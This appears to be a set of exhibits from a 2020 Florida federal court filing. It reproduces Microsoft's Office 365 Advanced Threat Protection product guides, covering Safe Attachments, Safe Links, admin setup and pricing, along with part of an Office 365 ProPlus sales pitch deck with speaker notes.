| 13 | getElementById | 30 | removeEventListener |
| 14 | getElementsByClassName | 31 | setAttribute |
| 15 | getElementsByName | 32 | text (read) |
| 16 | getElementsByTagName | 33 | text (write) |

Case 0:20-cv-60416-XXXX Document 1-4 Entered on FLSD Docket 02/26/2020 Page 1 of 2

# EXHIBIT 2

Case 0:20-cv-60416-XXXX Document 1-4 Entered on FLSD Docket 02/26/2020 Page 2 of 2

Microsoft | **Office**    Exchange    Plans & pricing ⌄    Solutions ⌄    Customer stories    Buy Office 365

# Office 365 Advanced Threat Protection

Protect your organization against sophisticated threats such as phishing and zero-day malware and automatically investigate and remediate attacks.

SEE PLANS AND PRICING

WATCH VIDEO >

Case 0:20-cv-60416-XXXX Document 1-5 Entered on FLSD Docket 02/26/2020 Page 1 of 16

# EXHIBIT 3



Case 0:20-cv-60416-AMC Document 3-1 Entered on FLSD Docket 02/26/2020 Page 73 of 726

# Contents

Exchange Online Advanced Threat Protection Introduction .................................................................. 2

Solution Overview ................................................................................................................................ 3

Service Architecture ............................................................................................................................ 4

Safe Attachments ................................................................................................................................ 5

Safe Links ............................................................................................................................................. 6

Reporting and Tracing ......................................................................................................................... 7

How to buy Exchange Online Advanced Threat Protection ................................................................. 8

Case 0:20-cv-60416-XXXX Document 1-5 Entered on FLSB Docket 02/26/2020 Page 4 of 16

# Exchange Online Advanced Threat Protection

Office 365 provides robust email protection against spam, viruses, and malware with Exchange Online Protection (EOP). But, as hackers around the globe launch increasingly sophisticated attacks, organizations are seeking tools that provide additional protection. We are pleased to offer customers new security capabilities in Office 365 with Exchange Online Advanced Threat Protection (ATP), an email filtering service that provides additional protection against specific types of advanced threats.

# Solution Overview

Microsoft Exchange Online Advanced Threat Protection (ATP) is a cloud-based email filtering service that helps protect your organization against unknown malware and viruses by providing robust zero-day protection, and includes features to help safeguard your organization from harmful links in real-time. ATP has rich reporting and URL trace capabilities that give admins insight into the kind of attacks happening in your organization.

Advanced Threat Protection for Exchange Online delivers the following benefits:

• Protection against unknown malware and viruses—Today EOP employs a robust and layered anti-virus protection powered with three different engines against known malware and viruses. ATP extends this protection through a feature called Safe Attachments, which helps protect against unknown malware and viruses, and provides better zero-day protection to safeguard your messaging system. All messages and attachments that don't have a known virus/malware signature are routed to a special hypervisor environment, where a behavior analysis is performed using a variety of machine learning and analysis techniques to detect malicious intent. If no suspicious activity is detected, the message is released for delivery to the mailbox.

• Real-time, time-of-click protection against malicious URLs—EOP scans each message in transit in Office 365 and provides time of delivery protection, blocking malicious hyperlinks in a message. But, attackers sometimes try to hide malicious URLs with seemingly safe links that are redirected to unsafe sites by a forwarding service after the message has been received. ATP's Safe Links feature proactively protects your users if they click such a link. That protection remains every time they click the link, as malicious links are dynamically blocked while good links can be accessed.

• Rich reporting and URL trace capabilities—ATP also offers rich reporting and tracking capabilities, so you can gain critical insights into who is getting targeted in your organization and the category of attacks you are facing. Reporting and message tracing allows you to investigate messages that have been blocked due to an unknown virus or malware, while the URL trace capability allows you to track individual malicious links in the messages that have been clicked.

Case 0:20-cv-60416-XXXX Document 1-5 Entered on FLSB Docket 02/26/2020 Page 6 of 16

# Service Architecture



Exchange Online Advanced Threat Protection Capabilities:

- Safe Links
  ATP's Safe Links feature proactively protects your users from malicious hyperlinks in a message. The protection remains every time they click the link, as malicious links are dynamically blocked while good links can be accessed.

- Safe Attachments
  Safe Attachments helps protect against unknown malware and viruses, and provides zero-day protection to safeguard your messaging system. All messages and attachments that don't have a known virus/malware signature are routed to a special environment where ATP uses a variety of machine learning and analysis techniques to detect malicious intent. If no suspicious activity is detected, the message is released for delivery to the mailbox.

## Safe attachments

What is Safe Attachments?
Safe Attachments is a new feature that opens suspected unknown attachment in a special hypervisor environment and detects malicious activity. It is designed to detect malicious attachments even before anti-virus signatures are available. Safe attachments will detonate attachments that are common targets for malicious content, such as Office documents, PDFs, executable file types, and Flash files.



Admin sets policy

Admin gets notification if message is blocked

### Set up a safe attachments policy

1. In the Exchange Admin Center (EAC), go to Advanced threats > Safe attachments. (Name your policy)

2. Select the action for unknown malware in attachments: Monitor, Block or Replace

3. Configure the Redirect attachment on detection and enter in an email address to receive the ATP notification. *It is recommended creating a new mailbox to receive ATP notifications since they will contain the attachment detected as unknown malware.

4. If you want to enable an attachments policy that can be applied to users, groups, and domains in your organization, go to the Applied to section of the ATP policy, and then choose The recipient is, The recipient domain is or the recipient if a member of.

5. Save your policy

## Safe Links

What is Safe Links?

Safe Links is a feature that prevents users from going to malicious web sites when they click on them in email. Safe Links has advanced reporting features that make it easy to determine who has clicked through a malicious link to support faster remediation.





### Setup a Safe Links Policy

1. In the Exchange Admin Center (EAC), go to Advanced threats > Safe links.

2. Go to Settings, and then choose On so that URLs will be rewritten and checked.

3. Optional: Uncheck Do not track user clicks if you don't want to store information about which user followed a particular link. Do check the box if you want to store this information.

4. Optional: Uncheck Do not allow users to click through to the original URL if you want your users to have the option of following a link even if ATP has determined that the link points to a malicious website. Do check the box in order to stop users from proceeding to the URL target of a link.

5. 5.Choose Save.

Case 0:20-cv-60416-AMC Document 3-1 Entered on FLSB Docket 02/26/2020 Page 79 of 726

## Reporting and Tracing

Message Trace

Find out if a specific email has been detonated, and get the results - You can keep track of each message and attachment that is routed to safe attachments after a policy is applied. To find out the status of such messages, go to the Exchange Admin Center and choose mail flow > message trace. The message trace details have information for each message and attachment.

URL Trace

Find out who has been following malicious links - Your safe links policy can be enabled to log which recipients are following links that have been protected by safe links. If tracking URLs is also enabled, this information can be found in the Exchange Admin Center by choosing mail flow > URL trace. You can sort the URL trace report by date range, recipients, and specific URLs.



Admins have complete visibility into who clicked on what links

Reporting by file types and disposition

ATP Disposition Reports

The disposition reports can be used to see the number of messages and file types

1. To access the disposition reports, in the Exchange Admin Center (EAC), go to Advanced threats > Click the reports icon drop down arrow to select either the Advanced Threat Protection Disposition Report by file type or disposition.

# How to buy Exchange Online Advanced Threat Protection

Protect your email in real time against unknown and sophisticated attacks.

Advanced Threat Protection is included in the new, most comprehensive enterprise plan – Office 365 Enterprise E5.

You can also add Advanced Threat Protection to the following Exchange and Office 365 subscription plans for $2.00 per user: Exchange Online Plan 1, Exchange Online Plan 2, Exchange Online Kiosk, Exchange Online Protection, Office 365 Business Essentials, Office 365 Business Premium, Office 365 Enterprise E1, Office 365 Enterprise E2, Office 365 Enterprise E3, Office 365 Enterprise E4, Office 365 Enterprise K1, Office 365 Enterprise K2.

To add Advanced Threat Protection to your subscription, contact your volume licensing reseller or visit office.com/enterprise-solutions to learn more.

© 2015 Microsoft. All rights reserved. This document is provided "as-is." Information and views expressed in this document, including URL and other Internet Web site references, may change without notice. Some information may relate to pre-released product and may be substantially modified before being commercially released or changed overtime with product updates. You bear the risk of using it.

# EXHIBIT 4

Case 0:20-cv-60416-XXXX Document 1-6 Entered on FLSD Docket 02/26/2020 Page 2 of 12



Microsoft

OFFICE 365
ADVANCED THREAT
PROTECTION

PRODUCT GUIDE

Case 0:20-cv-60416-XXXX Document 1-6 Entered on FLSB Docket 02/26/2020 Page 3 of 12

# Contents

Exchange Online Advanced Threat Protection .................................................................................. 3

Solution overview .............................................................................................................................. 4

Service architecture .......................................................................................................................... 5

Safe Attachments .............................................................................................................................. 6

Safe Links .......................................................................................................................................... 8

Reporting and tracing ....................................................................................................................... 9

How to buy Exchange Online Advanced Threat Protection .......................................................... 11

Case 0:20-cv-60416-AMC Document 3-1 Entered on FLSB Docket 02/26/2020 Page 84 of 726

# Exchange Online Advanced Threat Protection

Microsoft Office 365 provides robust email protection against spam, viruses, and malware with Microsoft Exchange Online Protection (EOP). But as hackers around the globe launch increasingly sophisticated attacks, organizations are seeking tools that provide additional protection. We are pleased to offer customers new security capabilities in Office 365 with Exchange Online Advanced Threat Protection (ATP), an email filtering service that provides additional protection against specific types of advanced threats.

Case 0:20-cv-60416-AMC Document 3-1 Entered on FLSB Docket 02/26/2020 Page 85 of 726

# Solution overview

Exchange Online Advanced Threat Protection is a cloud-based email filtering service that helps protect your organization against unknown malware and viruses by providing robust zero-day protection. ATP includes features to help safeguard your organization from harmful links in real time. It also has rich reporting and URL trace capabilities that give admins insight into the kind of attacks happening in your organization.

ATP for Exchange Online delivers the following benefits:

- **Protection against unknown malware and viruses.** Today EOP employs robust and layered antivirus protection powered with three different engines against known malware and viruses. ATP extends this protection through a feature called Safe Attachments, which helps protect against unknown malware and viruses and provides better zero-day protection to safeguard your messaging system. All messages and attachments that don't have a known virus/malware signature are routed to a special hypervisor environment, where a behavior analysis is performed using a variety of machine-learning and analysis techniques to detect malicious intent. If no suspicious activity is detected, the message is released for delivery to the mailbox.

- **Real-time, time-of-click protection against malicious URLs.** EOP scans each message in transit in Office 365 and provides time of delivery protection, blocking malicious hyperlinks in a message. But attackers sometimes try to hide malicious URLs within seemingly safe links that are redirected to unsafe sites by a forwarding service after the message has been received. The ATP Safe Links feature proactively protects your users if they click such a link. That protection remains every time they click the link, so malicious links are dynamically blocked while good links can be accessed.

- **Rich reporting and URL trace capabilities.** ATP also offers rich reporting and tracking capabilities, so you can gain critical insights into who is getting targeted in your organization and the category of attacks you are facing. Reporting and message tracing allows you to investigate messages that have been blocked due to an unknown virus or malware, while the URL trace capability allows you to track individual malicious links in the messages that have been clicked.

Case 0:20-cv-60416-AMC Document 3-1 Entered on FLSD Docket 02/26/2020 Page 86 of 726

# Service architecture



Exchange Online Advanced Threat Protection capabilities:

▪ **Safe Links**—proactively protects your users from malicious hyperlinks in a message. The protection remains every time they click the link, so malicious links are dynamically blocked while good links can be accessed.

▪ **Safe Attachments**—helps protect against unknown malware and viruses, and provides zero-day protection to safeguard your messaging system. All messages and attachments that don't have a known virus/malware signature are routed to a special environment where ATP uses a variety of machine-learning and analysis techniques to detect malicious intent. If no suspicious activity is detected, the message is released for delivery to the mailbox.

▪ **Dynamic Delivery**—a Safe Attachments feature that reduces latency of message delivery while an attachment is being inspected for malware.

# Safe Attachments

Safe Attachments is a feature that opens suspected unknown attachments in a special hypervisor environment and detects malicious activity. It is designed to detect malicious attachments even before anti-virus signatures are available. Safe Attachments detonates attachments that are common targets for malicious content, such as Office documents, PDFs, executable (EXE) files, and Flash files.

## What is Dynamic Delivery of Safe Attachments?

Dynamic Delivery is an innovative feature and a differentiated capability. After going through the standard Office 365 protection process of multiple antivirus engines and multiple spam filters, an email with a suspicious attachment enters the Safe Attachments sandbox environment, which has a detonation chamber to analyze the attachment and determine whether or not it's safe—a process that takes an average of four minutes (up to 30 minutes, depending on file type).

With Dynamic Delivery of Safe Attachments, that delay is eliminated by sending the body of the email with a placeholder attachment, while the actual suspicious attachment undergoes a Safe Attachments scan. Recipients can read and respond to the message, which includes notification that the original attachment is being analyzed. If the real attachment is cleared, it replaces the placeholder; if not, the admin can filter out the unwanted and potentially malicious attachment.



Case 0:20-cv-60416-AMC Document 3-1 Entered on FLSB Docket 02/26/2020 Page 88 of 726

# Set up a Safe Attachments policy

1. In the Exchange Admin Center (EAC), go to **Advanced threats > Safe attachments**, and then assign a name to your policy.

2. Select the action you want at your organization for unknown malware in attachments: either **Monitor**, **Block**, or **Replace**.

3. Under **Redirect attachment on detection**, select **Enable redirect** and enter an email address to receive the ATP notification.

   Microsoft recommends creating a new mailbox to receive ATP notifications because these notifications will contain the attachments detected as unknown malware.

4. To enable an attachments policy that can be applied to users, groups, and domains in your organization, go to the **Applied to** section of the ATP policy, and then choose **The recipient is**, **The recipient domain is**, or **The recipient is a member of**.

5. Save your policy.

Case 0:20-cv-60416-AMC Document 3-1 Entered on FLSB Docket 02/26/2020 Page 89 of 726

# Safe Links

Safe Links is a feature that helps prevent users from going to malicious websites when they click them in email. Safe Links has advanced reporting features that make it easy to determine who has clicked through to a malicious link, which supports faster remediation.



## Set up a Safe Links policy

6. In the Exchange Admin Center (EAC), go to **Advanced threats > Safe links**.
7. Go to **Settings**, and then choose **On** so that URLs will be rewritten and checked.
8. Optional: Clear the **Do not track user clicks** check box if you don't want to store information about which user followed a particular link. Select the check box to store this information.
9. Optional: Clear the **Do not allow users to click through to the original URL** check box if you want your users to have the option of following a link even if ATP has determined that the link points to a malicious website. Select the check box to stop users from proceeding to the URL target of a link.
10. Choose **Save**.

# Reporting and tracing

Find out whether a specific email has been detonated, and get the results. And find out who has been following malicious links.

## Message Trace

With the Message Trace feature, you can keep track of each message and attachment that is routed to Safe Attachments after a policy is applied. To find out the status of such messages, go to the Exchange Admin Center and choose **mail flow > message trace**. The Message Trace details have information for each message and attachment.

## URL Trace

Your Safe Links policy can be enabled to log which recipients are following links that have been protected by Safe Links. If tracking URLs is also enabled, this information can be found in the Exchange Admin Center by choosing **mail flow > URL trace**. You can sort the URL Trace report by date range, recipients, and specific URLs.



Admins have complete visibility into who clicked on what links

Reporting by file types and disposition

## View ATP Disposition Reports

The disposition reports created by ATP can be used to see the number of messages and file types routed to Safe Attachments.

1. In the Exchange Admin Center (EAC), go to **Advanced threats**.
2. Click the reports icon arrow, and choose to view the Advanced Threat Protection Disposition Report by either file type or disposition.

## Zero-hour Auto Purge

If an unread email is incorrectly categorized as spam, malicious, or safe, Zero-hour Auto Purge provides the ability to change that verdict. For example, if a message is delivered to your Inbox and later found to be spam, Zero-hour Auto Purge moves that message from the Inbox to the spam folder; the reverse is true for messages misclassified as spam. Admins have total control over whether or not to use this feature, because Zero-hour Auto Purge can be disabled in the EAC.

# How to buy Exchange Online Advanced Threat Protection

Protect your email in real time against unknown and sophisticated attacks.

Advanced Threat Protection is included in the most comprehensive enterprise plan: Office 365 Enterprise E5.

You can also add Advanced Threat Protection to the following Exchange and Office 365 subscription plans for $2.00 per user per month: Exchange Online Plan 1, Exchange Online Plan 2, Exchange Online Kiosk, Exchange Online Protection, Office 365 Business Essentials, Office 365 Business Premium, Office 365 Enterprise E1, Office 365 Enterprise E2, Office 365 Enterprise E3, Office 365 Enterprise E4, Office 365 Enterprise K1, Office 365 Enterprise K2.

To add Advanced Threat Protection to your subscription, contact your volume licensing reseller or visit office.com/enterprise-solutions to learn more.

© 2016 Microsoft. All rights reserved. This document is provided "as-is." Information and views expressed in this document, including URL and other Internet website references, may change without notice. Some information may relate to prereleased product and may be substantially modified before being commercially released or changed overtime with product updates. You bear the risk of using it.

# EXHIBIT 5

Case 0:20-cv-60416-AMC Document 3-1 Entered on FLSD Docket 02/26/2020 Page 94 of 726

# Office 365 ProPlus Pitch Deck Overview

**Last Updated: January, 2018**

Office 365 ProPlus is the most secure suite of Office cloud productivity apps, offering the broadest and deepest set of capabilities across all your devices, including rich, intelligent services that assist in content creation, analysis, scheduling, and communications, with immediate access to documents in the cloud.

This presentation is intended to provide an overview of the breadth of value that Office 365 ProPlus offers. The 'Office 365 ProPlus Pitch Deck presentation is our hero story for the Office apps.

This presentation focuses on product truths and customer-driven business scenarios and includes supplemental material that highlights the growing innovation gap between Office 365 ProPlus and legacy clients and the interdependency of Office 365 ProPlus with other Office 365 services. Please note, there is an extensive appendix of materials that can be used to support the core product pitch.

We suggest using the core pitch portion of the deck either in its entirety as part of a 45-60 minute session or customizing elements of it for a more specific presentation.

| | |
|---|---|
| **Presentation** | 45-60 mins |
| **Open Discussion** | 10 mins |

| Slide | Notes |
|-------|-------|
|  | **Guidance**: This is a hidden slide, not to be shown to customers. This slide will provide guidance on who the target of the presentation is, desired outcomes, how to present the deck, usage and contact info, and more.<br><br>**Talk track**: N/a |
|  | **Guidance**: Title slide. Introduce yourself, set the agenda, etc.<br><br>**Talk track**: N/a |
| Technology's role in the workplace | **Guidance**: The goal of this slide is to make the case that employee engagement is imperative for a thriving workplace and that technology is a critical component of engaging employees. This slide is supported by compelling data points and industry research.<br><br>**Talk track**: I'd like to start off by looking at technology's role in the modern workplace and how said technology can be critically important to the well-being of your workforce.<br><br>There has been a lot of research conducted around the topic of employee engagement and satisfaction in the workplace and one of the key takeaways folks are finding is that technology is a crucial component of overall satisfaction. A recent study by Staples found that 75% of American workers say their employers don't give them access to the latest technology to do their job efficiently[1]. Another study suggested that 2 in 5 |

employees state they would quit their jobs over poor workplace technology[2]. Taken together, these are staggering statistics that highlight the value workers are placing on the technology available to them and the role it plays in their job satisfaction and engagement.

Having more highly engaged teams also pays off in the long run. Gallup suggests that teams with high employee engagement rates are 21% more productive and have 28% less internal theft than those with low engagement[3]. Additionally, highly engaged business units result in 21% greater profitability according to Gallup[4].

Gallup also estimates that actively disengaged employees cost the U.S. $483 billion to $605 billion each year in lost productivity[10].

At the end of the day, the research paints a pretty clear picture that effective technologies are a major component of employee engagement. And employee engagement is key driver of productivity and profitability.

**Additional notes**:

Supporting data points:
1. 75% of American workers say their employers don't give them access to the latest technology to do their job efficiently
2. 2 in 5 employees state they would quit their jobs over poor workplace technology
3. Teams with high employee engagement rates are 21% more productive and have 28% less internal theft than those with low engagement
4. Highly engaged business units result in 21% greater profitability
5. Employees who believe their workplace effectively uses mobile tech are more creative, satisfied, and productive at work
6. Employees who spend 60% to 80% of their time working remotely are likely to have the highest workplace engagement
7. Employee retention will increase 10% by 2020 in organizations that have a "choose your own work style" culture
8. Productivity improves by 20-25% in organizations with connected employees

9. Employees who are engaged are 27% more likely to report "excellent" performance
10. Gallup estimates that actively disengaged employees cost the U.S. $483 billion to $605 billion each year in lost productivity

Sources:

1. The Staples Business Advantage Workplace Index 2016: Measuring Workplace Trends and Work Culture; https://go.staplesadvantage.com/workplaceindex2016
2. US Future-Ready Workforce Study, 2016
3. Gallup, Managing Employee Risk Requires a Culture of Compliance, 2016; http://www.gallup.com/businessjournal/190352/managing-employee-risk-requires-culture-compliance.aspx
4. Gallup, State of the American Workplace, 2017; http://news.gallup.com/reports/199961/7.aspx#aspnetForm
5. The Economist: Intelligence Unit; http://www.arubanetworks.com/pdf-viewer/?q=/assets/EIUStudy.pdf
6. Gallup, 2017; http://news.gallup.com/businessjournal/206180/engaged-remote-workforce.aspx
7. Gartner Predicts 2017: Boosting Business Results Through Personal Choice in the Digital Workplace; https://www.gartner.com/doc/3512517/predicts--boosting-business-results
8. McKinsey, the social economy: Unlocking value and productivity through social technologies; https://www.mckinsey.com/industries/high-tech/our-insights/the-social-economy
9. Gallup, Well-Being Enhances Benefits of Employee Engagement, 2015; http://news.gallup.com/businessjournal/186386/enhances-benefits-employee-engagement.aspx
10. Gallup, State of the American Workplace, 2017; http://news.gallup.com/reports/199961/7.aspx#aspnetForm



**Guidance**: This is the Microsoft 365 for Enterprise "hero" slide for Office 365 ProPlus. The purpose of this slide is to ground the audience in the strategic direction of Microsoft as a company. With Microsoft 365, organizations can truly attain a secure and productive enterprise. This slide will also help the audience orient themselves as to where Office 365 ProPlus fits into the broader Microsoft SKU strategy.

**Talk track**: Introducing Microsoft 365 for Enterprise, your comprehensive solution for a secure and productive organization. Microsoft 365 helps solve the employee engagement challenges surfaced earlier while also providing the mobility and security solutions that organizations like yours need in this modern age of cybersecurity threats and mobile workforces.

While Microsoft 365 provides a lot of value through Windows 10 and Enterprise Mobility + Security services our focus today is on Office 365, specifically ProPlus, and how this productivity software unlocks creativity, is built for teamwork, is integrated for simplicity, and provides intelligent security. Those four concepts make up the core promises of Microsoft 365 as a whole and ProPlus plays a special role in bringing that value to life.



**Guidance**: This slide provides a 10,000 foot view of the ProPlus suite of products and services. The main intention here is to level-set with the audience what we are specifically talking about when we say "ProPlus". This slide will also help you quickly articulate the value of ProPlus at a high-level.

**Talk track**: So I want to hone in on the main topic of today's conversation and that is ProPlus. When people think of Office traditionally, they are thinking of the apps that comprise the ProPlus suite: Outlook, Word, PowerPoint, Excel, and so on. While the broader Office 365 Enterprise SKUs (E3, and E5) contain ProPlus, they also provide additional services such as SharePoint, Exchange, Teams, Yammer, and more. Our focus here is on the ProPlus specific value proposition and why it may be a better option than a traditional perpetual client license model. (And also why it is better than any other competitor software on the market!) But we will explore that topic in more detail in later slides.

To give a quick summary, ProPlus contains all the desktop apps your people know, love, and have likely been using for many years.

*[note to speaker – pick ~2 of each category to reference, don't read all apps/services]*

- Outlook – our signature email application that helps you communicate
- Word – the world's universal word processor and document creator
- Excel – the favored spreadsheet app
- PowerPoint – the de-facto standard in presentation software
- OneNote – the most prominent note taking tool
- Access – an easy way to create lightweight database apps
- Publisher – a better way to work with pictures
- OneDrive – a file hosting service for anywhere access to your info
- Skype for Business – software to help connect people through IM, phone, and video calls

But ProPlus SKUs also come with a number of additional benefits, many of which are unavailable in Professional Plus—the perpetual license version. These benefits include:

- 5 PC installs—This means each employee can activate Office on a broad range of PC devices with access to all shared files and data that is tied to their own account
- 5 tablets and 5 phones—Employees can also put Office on their tablets and mobile devices so they can have access to their apps and info from anywhere
- Online versions—Your people will also get access to robust online versions of their office apps so they can get work done on any device, regardless of whether Office is installed, anywhere they have an internet connection
- 1 TB cloud storage—Because ProPlus comes with OneDrive, your people don't need to worry about running out of space on their local machines—there is ample room in the cloud for all their files
- Up to date—This is a major advantage over perpetual licenses as your apps will always be up-to-date with the latest and greatest features from the Office teams at Microsoft

- Secure and compliant—ProPlus boasts cutting-edge security practices with five layers of security and proactive monitoring help keep customer data safe
- Fast track assistance— Microsoft FastTrack for Office 365 is our customer success service designed to help you move to Office 365 smoothly and with confidence, and realize business value faster
- 24/7 phone support— Microsoft Support provides telephone and online answers, how-to resources and connections with other Office 365 customers for setup and quick fixes



Top 10 reasons to deploy **ProPlus** today!

| | |
|---|---|
| More secure. | ProPlus offers the most secure way to connect to Office 365 services. |
| Anywhere access. | Access your work across all your devices with 1TB OneDrive storage and multiple installs. |
| Intelligence. | Users can do their best work using Intelligent features built into Office 365 ProPlus |
| Collaboration. | Built in collaboration features enable teams to work together seamlessly. |
| Mitigate shadow IT. | Collaboration in apps like WXP means less leaks via unauthorized apps outside your firewall. |
| Proactive app compatibility. | Make sure existing apps function optimally while assessing macros and add-in compatibility. |
| Detect threats early. | Advanced threat intelligence empowers you to take action before an issue occurs. |
| Deployment assistance. | FastTrack deployment assistance helps get you up and running faster. |
| Always on. | With a 99.9% uptime guarantee, your users will never be without the apps your business relies on. |
| Stay current. | With monthly updates, you'll always be up-to-date with the latest security and end user features. |

**Guidance**: The purpose of this slide is to provide the audience with some of the most compelling reasons to choose a subscription-based ProPlus service. The assumption here is that you are pitching to a customer who is up for renewal shortly and considering options. This is a useful slide in a scenario where the customer is thinking of switching from a perpetual license to subscription or if another competitor is in the account (like Google Docs).

**Talk track**: There are many reasons to deploy ProPlus. You may need or want to start thinking about the renewal process and we have summarized what we think are the top 10 reasons why you would want to go with a subscription-based services like Office 365 ProPlus.

1. More secure—ProPlus offers the most secure way to connect to Office 365 services. At the service level, Office 365 uses the defense-in-depth approach to provide physical, logical, and data layers of security features and operational best practices. In addition, Office 365 gives you enterprise-grade user and admin controls to further secure your environment.
2. Anywhere access— Access your work across all your devices with 1TB OneDrive storage and multiple installs. Office 365 is designed for the way people work today, empowering your teams to stay connected and be productive no matter where they are.
3. Intelligence. Users can do their best work using Intelligent features built into Office 365 ProPlus such ass Designer, Tap, Editor, Researcher and more.

4. Collaboration—Built-in collaboration features enable teams to work together seamlessly. Securely view, co-author, and share files anywhere with your team, thanks to integration with file-sharing and storage services in the cloud.

5. Mitigate shadow IT—Collaboration in apps like Word, Excel, and PowerPoint (WXP) means less leaks via unauthorized apps outside your firewall. There's no need to spin up a Google Docs account as all the file sharing you'll ever need is built right into the service.

6. Proactive app compatibility—Make sure existing apps function optimally while assessing macros and add-in compatibility with services such as Ready for Windows and the Readiness Toolkit.

7. Detect threats early—Advanced threat intelligence empowers you to take action before an issue occurs with features like Safe Attachments, Safe Links, URL detonation, and more.*

8. Deployment assistance—FastTrack deployment assistance helps get you up and running faster. FastTrack resources and services are included with Office 365 ProPlus for customers with at least 50 seats.

9. Always on—With a 99.9% uptime guarantee, your users will never be without the apps your business relies on. Services are financially backed.

10. Stay current—With monthly updates, you'll always be up-to-date with the latest security and end user features. No need to pay for version upgrades; updates are included in your subscription. New features are rolled out to Office 365 customers regularly.

*Some features only available in E5 SKUs

---

Additional reasons to deploy **ProPlus**

| | |
|---|---|
| End of support. | End-of-support is coming for Windows 7 and Office 2010 in 2020. |
| Lack of connectivity. | In 2020, all versions of Office released before 2015 will be unable to connect to Office 365 services like SharePoint Online and Exchange Online. |
| "Click to run" only. | MSI will not be supported on Office perpetual editions in the future, only 'click to run' (C2R). |
| Shorter support windows. | Support policies for Office 2019 will be reduced to 5 (+2) years. |

**Guidance**: This is a hidden slide and should likely only be shown to customers who you feel would welcome this information or be comfortable with hearing it. This slide should likely not be shown to all customers and only applies to customers on or considering a perpetual license model. This slide may be better used as talk track material and not explicitly shown. Please use discretion if showing this slide.

**Talk track**: There are additionally a number of reasons to think about moving to an Office 365 ProPlus deployment. Beyond the continuous updates and advanced features,

Case 0:20-cv-60416-XXXX   Document 3-1   Entered on FLSD Docket 02/26/2020   Page 102 of 726

there are some profound reasons why ProPlus makes more sense for your business than a perpetual license:

1. End of support is coming for Windows 7 and Office 2010 in the year 2020. For those of you who are still running on this software, you will soon be facing tech refresh conversations. There is no better time than the present to start planning your rollout and there is no better future-proof productivity software than Office 365 ProPlus.
2. 2020 is also the year when all versions of Office released before 2015 will be unable to connect to Office 365 services. This will affect services like Exchange Online, SharePoint Online, OneDrive for Business, and/or Skype for Business. As the business world moves to subscription-based models, Microsoft will dedicate more and more resources to supporting this market trend and enhancing the subscription experience for users.
3. MSI will not be supported on Office perpetual editions in the future, only "click-to-run" (C2R). Yet another reason why subscription models make the most sense for an organization. Again, Microsoft is investing in subscription-based deployment technologies by devoting resources to C2R tech.
4. With the increased focus on subscriptions, support policies for perpetual clients will be reduced to 5 (+2) years moving forward. This includes the upcoming release of Office 2019.



**Guidance**: The intention here is to bring the conversation full circle and explore how ProPlus aligns value to the Microsoft 365 value proposition pillars. This slide features hyperlinks that allow you to navigate to different sections within the deck. If you want to specifically touch on a topic and ignore other just click or touch the images or titles to jump to that section. If you want to move through the deck chronologically, simply progress the slide.

**Talk track**: Now that we've discussed what ProPlus is and the reasons it makes sense to deploy it, I want to shift our focus to how ProPlus empowers your business in a variety of scenarios and delivers on the promises of Microsoft 365 mentioned earlier. In the following sections we will explore some of our top features that we feel will help your organization unlock creativity, collaborate as a team, make ProPlus easier to use and deploy, and protect your company's information.

Case 0:20-cv-60416-XXXX   Document 1-1   Entered on FLSD Docket 02/26/2020   Page 11 of 28



**Guidance**: This slide is the "hero" slide for the "unlocks creativity" section. If you want to consolidate your presentation and not explore each of the main topics and supporting features/capabilities highlighted on this slide, you can remove any related subsequent slides. We recommend providing some explanation for the features showcased here. The details for those features can be found in the following slides and in the feature-specific slides in the appendix. The talk track has been put together with the assumption that all following slides will be shown. If you are condensing your presentation, your own talk track may require modification. This slide also features hyperlinks that will help you navigate to any one of the topic slides and can be used to skip ahead to a section you or the audience feels is most relevant.

**Talk track**: ProPlus empowers your users to truly craft engaging content that tells your story as an organization and as people. There are four main topics we want to explore here and numerous features that support those topics.

Our focus today will be on how ProPlus empowers your users to:
- Make amazing content
- Get work done smarter and faster
- Visualize data in new ways
- And work naturally with ink and touch



**Guidance**: This slide explores the "make amazing content" portion of the "unlocks creativity" Microsoft 365 pillar. Use this slide if relevant to your audience. This slide features a number of hyperlinks that enable you to navigate to other sections of the presentation. The top bar navigation will enable you to jump to the selected section's "hero" slide, while the bottom "click here for a feature overview" bar will take you to a slide in the appendix that features a PowerPoint Zoom overview of every feature that relates to the "unlocks creativity" Microsoft 365 pillar.

**Talk track**: Let's explore how ProPlus enables you and your users to make amazing content.

Bring presentations to life with PowerPoint Morph, Zoom, and 3D:

Case 0:20-cv-60416-XXXX   Document 1-1   Entered on FLSD Docket 02/26/2020   Page 12 of 28

- Make your presentations more dynamic and exciting
- Create cinematic motion effortlessly
- Apply motion to 3D objects for a richer experience
- Jump to and from slides and sections in an order you decide

Make your message crisp with Editor:
- Check for clarity, consistency, and conciseness with intelligent tools
- Incorporate suggestions based on your organization's guidelines
- Receive help and feedback in over 90 languages

Find and reuse content from your team with Tap:
- Find and reuse files and documents used by you and your team
- Stay focused and search for what you need, right within the pane
- Pull content from those files directly into Word

Create stunning slides in a few clicks using PowerPoint Designer:
- Create designer-grade presentations in minutes
- Maximize visual impact with multiple design options
- Take advantage of cloud intelligence to analyze and identify the best imagery for your presentations

Please note this is not an exhaustive list. There are many more features in ProPlus that will enable your people to make amazing content.



**Guidance**: This slide explores the "get work done smarter and faster" portion of the "unlocks creativity" Microsoft 365 pillar. Use this slide if relevant to your audience. This slide features a number of hyperlinks that enable you to navigate to other sections of the presentation. The top bar navigation will enable you to jump to the selected section's "hero" slide, while the bottom "click here for a feature overview" bar will take you to a slide in the appendix that features a PowerPoint Zoom overview of every feature that relates to the "unlocks creativity" Microsoft 365 pillar.

**Talk track**: There are a many ways ProPlus enables you and your users to get work done smarter and faster

Case 0:20-cv-60416-XXXX   Document 1-1   Entered on FLSD Docket 02/26/2020   Page 19 of 28

Focused Inbox:
- Stay on top of incoming email without having to visit another folder
- Prioritize your actions based on email from the people you interact with often, and the content of the email itself
- Focus on the emails that matter most to you

Researcher:
- Explore and research content without leaving Word
- Add relevant quotes, citable sources, and images to the document
- View related topics to the content being researched

Search:
- Search email up to 66% faster than with prior versions of Outlook
- Find the right person fast with fuzzy name matching
- Put a face to a name with pictures from the company directory

Smart Lookup:
- Find definitions, synonyms, and parts of speech for any word
- Incorporate information from Bing-powered web searches to enhance your content
- Define unfamiliar terms from Excel spreadsheets

Please note this is not an exhaustive list. There are many more features in ProPlus that will enable your people to get work done smarter and faster.

Case 0:20-cv-60416-XXXX   Document 1-1   Entered on FLSD Docket 02/26/2020   Page 14 of 28



